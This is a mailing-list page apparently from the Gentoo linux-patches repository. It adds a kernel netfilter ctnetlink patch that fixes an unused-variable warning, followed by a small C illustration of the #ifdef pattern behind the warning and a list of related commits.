--- a/0000_README
+++ b/0000_README
@@ -59,6 +59,10 @@ Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758
 
+Patch:  2010_netfilter-ctnetlink-compilation-fix.patch
+From:   https://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf.git
+Desc:   netfilter: ctnetlink: fix compilation warning after data race fixes in ct mark
+
 Patch:  2900_tmp513-Fix-build-issue-by-selecting-CONFIG_REG.patch
 From:   https://bugs.gentoo.org/710790
 Desc:   tmp513 requires REGMAP_I2C to build.  Select it by default in Kconfig. See bug #710790. Thanks to Phil Stracchino

diff --git a/2010_netfilter-ctnetlink-compilation-fix.patch b/2010_netfilter-ctnetlink-compilation-fix.patch
new file mode 100644
index 00000000..b7bd4dee
--- /dev/null
+++ b/2010_netfilter-ctnetlink-compilation-fix.patch
@@ -0,0 +1,90 @@
+From 1feeae071507ad65cf9f462a1bdd543a4bf89e71 Mon Sep 17 00:00:00 2001
+From: Pablo Neira Ayuso <pablo@netfilter.org>
+Date: Mon, 28 Nov 2022 10:58:53 +0100
+Subject: netfilter: ctnetlink: fix compilation warning after data race fixes
+ in ct mark
+
+All warnings (new ones prefixed by >>):
+
+   net/netfilter/nf_conntrack_netlink.c: In function '__ctnetlink_glue_build':
+>> net/netfilter/nf_conntrack_netlink.c:2674:13: warning: unused variable 'mark' [-Wunused-variable]
+    2674 |         u32 mark;
+         |             ^~~~
+
+Fixes: 52d1aa8b8249 ("netfilter: conntrack: Fix data-races around ct mark")
+Reported-by: kernel test robot <lkp@intel.com>
+Tested-by: Ivan Babrou <ivan@ivan.computer>
+Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
+---
+ net/netfilter/nf_conntrack_netlink.c | 19 ++++++++++---------
+ 1 file changed, 10 insertions(+), 9 deletions(-)
+
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index d71150a40fb08..1286ae7d46096 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -328,8 +328,13 @@ nla_put_failure:
+ }
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-static int ctnetlink_dump_mark(struct sk_buff *skb, u32 mark)
++static int ctnetlink_dump_mark(struct sk_buff *skb, const struct nf_conn *ct)
+ {
++	u32 mark = READ_ONCE(ct->mark);
++
++	if (!mark)
++		return 0;
++
+ 	if (nla_put_be32(skb, CTA_MARK, htonl(mark)))
+ 		goto nla_put_failure;
+ 	return 0;
+@@ -543,7 +548,7 @@ static int ctnetlink_dump_extinfo(struct sk_buff *skb,
+ static int ctnetlink_dump_info(struct sk_buff *skb, struct nf_conn *ct)
+ {
+ 	if (ctnetlink_dump_status(skb, ct) < 0 ||
+-	    ctnetlink_dump_mark(skb, READ_ONCE(ct->mark)) < 0 ||
++	    ctnetlink_dump_mark(skb, ct) < 0 ||
+ 	    ctnetlink_dump_secctx(skb, ct) < 0 ||
+ 	    ctnetlink_dump_id(skb, ct) < 0 ||
+ 	    ctnetlink_dump_use(skb, ct) < 0 ||
+@@ -722,7 +727,6 @@ ctnetlink_conntrack_event(unsigned int events, const struct nf_ct_event *item)
+ 	struct sk_buff *skb;
+ 	unsigned int type;
+ 	unsigned int flags = 0, group;
+-	u32 mark;
+ 	int err;
+ 
+ 	if (events & (1 << IPCT_DESTROY)) {
+@@ -827,9 +831,8 @@ ctnetlink_conntrack_event(unsigned int events, const struct nf_ct_event *item)
+ 	}
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-	mark = READ_ONCE(ct->mark);
+-	if ((events & (1 << IPCT_MARK) || mark) &&
+-	    ctnetlink_dump_mark(skb, mark) < 0)
++	if (events & (1 << IPCT_MARK) &&
++	    ctnetlink_dump_mark(skb, ct) < 0)
+ 		goto nla_put_failure;
+ #endif
+ 	nlmsg_end(skb, nlh);
+@@ -2671,7 +2674,6 @@ static int __ctnetlink_glue_build(struct sk_buff *skb, struct nf_conn *ct)
+ {
+ 	const struct nf_conntrack_zone *zone;
+ 	struct nlattr *nest_parms;
+-	u32 mark;
+ 
+ 	zone = nf_ct_zone(ct);
+ 
+@@ -2733,8 +2735,7 @@ static int __ctnetlink_glue_build(struct sk_buff *skb, struct nf_conn *ct)
+ 		goto nla_put_failure;
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-	mark = READ_ONCE(ct->mark);
+-	if (mark && ctnetlink_dump_mark(skb, mark) < 0)
++	if (ctnetlink_dump_mark(skb, ct) < 0)
+ 		goto nla_put_failure;
+ #endif
+ 	if (ctnetlink_dump_labels(skb, ct) < 0)
+-- 
+cgit 
+
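
The warning itself generalizes: when every read of a local variable sits
behind an #ifdef, building with that option disabled leaves the variable
unused, and the clean fix is to move the read into the helper that needs
it, as this patch does with ctnetlink_dump_mark(). A self-contained sketch
of the pattern with assumed names (plain C, not kernel code; READ_ONCE()
is replaced by an ordinary read):

#include <stdio.h>

struct conn {
	unsigned int mark;
};

#ifdef CONFIG_MARK
/* After the fix: the helper fetches the field itself and handles the
 * mark == 0 case, so callers keep no local that can end up unused. */
static int dump_mark(const struct conn *ct)
{
	unsigned int mark = ct->mark;

	if (!mark)
		return 0;
	return printf("mark=%u\n", mark);
}
#endif

static void dump(const struct conn *ct)
{
	/* Before the fix, "u32 mark = ct->mark;" lived here and triggered
	 * -Wunused-variable whenever CONFIG_MARK was disabled. */
#ifdef CONFIG_MARK
	dump_mark(ct);
#else
	(void)ct;
#endif
}

int main(void)
{
	struct conn c = { .mark = 7 };

	dump(&c);
	return 0;
}

Building once with -DCONFIG_MARK and once without (both with -Wall)
compiles cleanly either way; reintroducing the commented-out local in
dump() reproduces the original warning.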



end of thread, other threads: [~2024-09-30 16:04 UTC | newest]

Thread overview: 161+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2023-12-03 11:16 [gentoo-commits] proj/linux-patches:6.1 commit in: / Mike Pagano
  -- strict thread matches above, loose matches on Subject: below --
2024-09-30 16:04 Mike Pagano
2024-09-18 18:04 Mike Pagano
2024-09-12 12:35 Mike Pagano
2024-09-08 11:06 Mike Pagano
2024-09-04 13:52 Mike Pagano
2024-08-29 16:49 Mike Pagano
2024-08-19 10:43 Mike Pagano
2024-08-14 15:06 Mike Pagano
2024-08-14 14:11 Mike Pagano
2024-08-11 13:32 Mike Pagano
2024-08-11 13:29 Mike Pagano
2024-08-10 15:45 Mike Pagano
2024-08-03 15:28 Mike Pagano
2024-07-27 13:47 Mike Pagano
2024-07-25 12:15 Mike Pagano
2024-07-25 12:09 Mike Pagano
2024-07-18 12:15 Mike Pagano
2024-07-15 11:16 Mike Pagano
2024-07-11 11:49 Mike Pagano
2024-07-05 11:07 Mike Pagano
2024-06-27 13:10 Mike Pagano
2024-06-27 12:33 Mike Pagano
2024-06-21 14:07 Mike Pagano
2024-06-16 14:33 Mike Pagano
2024-06-12 10:16 Mike Pagano
2024-05-25 15:16 Mike Pagano
2024-05-17 11:36 Mike Pagano
2024-05-05 18:10 Mike Pagano
2024-05-02 15:01 Mike Pagano
2024-04-29 11:30 Mike Pagano
2024-04-29 11:27 Mike Pagano
2024-04-27 22:45 Mike Pagano
2024-04-27 17:06 Mike Pagano
2024-04-18  3:05 Alice Ferrazzi
2024-04-13 13:07 Mike Pagano
2024-04-10 15:10 Mike Pagano
2024-04-03 13:54 Mike Pagano
2024-03-27 11:24 Mike Pagano
2024-03-15 22:00 Mike Pagano
2024-03-06 18:07 Mike Pagano
2024-03-01 13:07 Mike Pagano
2024-02-23 13:19 Mike Pagano
2024-02-23 12:37 Mike Pagano
2024-02-16 19:00 Mike Pagano
2024-02-05 21:01 Mike Pagano
2024-02-01  1:23 Mike Pagano
2024-01-26  0:09 Mike Pagano
2024-01-20 11:45 Mike Pagano
2024-01-15 18:47 Mike Pagano
2024-01-10 17:16 Mike Pagano
2024-01-05 14:54 Mike Pagano
2024-01-05 14:50 Mike Pagano
2024-01-04 16:10 Mike Pagano
2024-01-01 13:46 Mike Pagano
2023-12-20 16:56 Mike Pagano
2023-12-13 18:27 Mike Pagano
2023-12-11 14:20 Mike Pagano
2023-12-08 10:55 Mike Pagano
2023-12-01 10:36 Mike Pagano
2023-11-28 17:51 Mike Pagano
2023-11-20 11:23 Mike Pagano
2023-11-08 14:02 Mike Pagano
2023-11-02 11:10 Mike Pagano
2023-10-25 11:36 Mike Pagano
2023-10-22 22:53 Mike Pagano
2023-10-19 22:30 Mike Pagano
2023-10-18 20:04 Mike Pagano
2023-10-15 17:40 Mike Pagano
2023-10-10 22:56 Mike Pagano
2023-10-06 13:18 Mike Pagano
2023-10-05 14:23 Mike Pagano
2023-09-23 11:03 Mike Pagano
2023-09-23 10:16 Mike Pagano
2023-09-19 13:20 Mike Pagano
2023-09-15 18:04 Mike Pagano
2023-09-13 11:19 Mike Pagano
2023-09-13 11:05 Mike Pagano
2023-09-06 22:16 Mike Pagano
2023-09-02  9:56 Mike Pagano
2023-08-30 14:42 Mike Pagano
2023-08-27 21:41 Mike Pagano
2023-08-26 15:19 Mike Pagano
2023-08-26 15:00 Mike Pagano
2023-08-23 18:08 Mike Pagano
2023-08-16 18:32 Mike Pagano
2023-08-16 18:32 Mike Pagano
2023-08-11 11:55 Mike Pagano
2023-08-08 18:40 Mike Pagano
2023-08-03 11:54 Mike Pagano
2023-08-03 11:48 Mike Pagano
2023-07-27 11:48 Mike Pagano
2023-07-24 20:27 Mike Pagano
2023-07-23 15:14 Mike Pagano
2023-07-19 17:05 Mike Pagano
2023-07-05 20:34 Mike Pagano
2023-07-05 20:28 Mike Pagano
2023-07-04 13:15 Mike Pagano
2023-07-01 18:27 Mike Pagano
2023-06-28 10:26 Mike Pagano
2023-06-21 14:54 Alice Ferrazzi
2023-06-14 10:17 Mike Pagano
2023-06-09 12:02 Mike Pagano
2023-06-09 11:29 Mike Pagano
2023-06-05 11:48 Mike Pagano
2023-06-02 15:07 Mike Pagano
2023-05-30 16:51 Mike Pagano
2023-05-24 17:05 Mike Pagano
2023-05-17 10:57 Mike Pagano
2023-05-11 16:08 Mike Pagano
2023-05-11 14:49 Mike Pagano
2023-05-10 17:54 Mike Pagano
2023-05-10 16:18 Mike Pagano
2023-04-30 23:50 Alice Ferrazzi
2023-04-26 13:19 Mike Pagano
2023-04-20 11:16 Alice Ferrazzi
2023-04-13 16:09 Mike Pagano
2023-04-06 10:41 Alice Ferrazzi
2023-03-30 20:52 Mike Pagano
2023-03-30 11:21 Alice Ferrazzi
2023-03-22 14:15 Alice Ferrazzi
2023-03-21 13:32 Mike Pagano
2023-03-17 10:43 Mike Pagano
2023-03-13 11:30 Alice Ferrazzi
2023-03-11 14:09 Mike Pagano
2023-03-11 11:19 Mike Pagano
2023-03-10 12:57 Mike Pagano
2023-03-10 12:47 Mike Pagano
2023-03-06 17:30 Mike Pagano
2023-03-03 13:01 Mike Pagano
2023-03-03 12:28 Mike Pagano
2023-02-27 16:59 Mike Pagano
2023-02-26 18:24 Mike Pagano
2023-02-26 18:16 Mike Pagano
2023-02-25 11:02 Alice Ferrazzi
2023-02-24  3:03 Alice Ferrazzi
2023-02-22 13:46 Alice Ferrazzi
2023-02-14 18:35 Mike Pagano
2023-02-13 13:38 Mike Pagano
2023-02-09 12:52 Mike Pagano
2023-02-09 12:49 Mike Pagano
2023-02-09 12:47 Mike Pagano
2023-02-09 12:40 Mike Pagano
2023-02-09 12:34 Mike Pagano
2023-02-06 12:46 Mike Pagano
2023-02-02 19:02 Mike Pagano
2023-02-01  8:05 Alice Ferrazzi
2023-01-24  7:19 Alice Ferrazzi
2023-01-22 14:59 Mike Pagano
2023-01-18 11:29 Mike Pagano
2023-01-14 13:48 Mike Pagano
2023-01-12 15:25 Mike Pagano
2023-01-12 12:16 Mike Pagano
2023-01-07 11:10 Mike Pagano
2023-01-04 11:37 Mike Pagano
2022-12-31 15:28 Mike Pagano
2022-12-21 19:05 Alice Ferrazzi
2022-12-16 20:25 Mike Pagano
2022-12-16 19:44 Mike Pagano
2022-12-11 23:32 Mike Pagano
2022-12-11 14:28 Mike Pagano
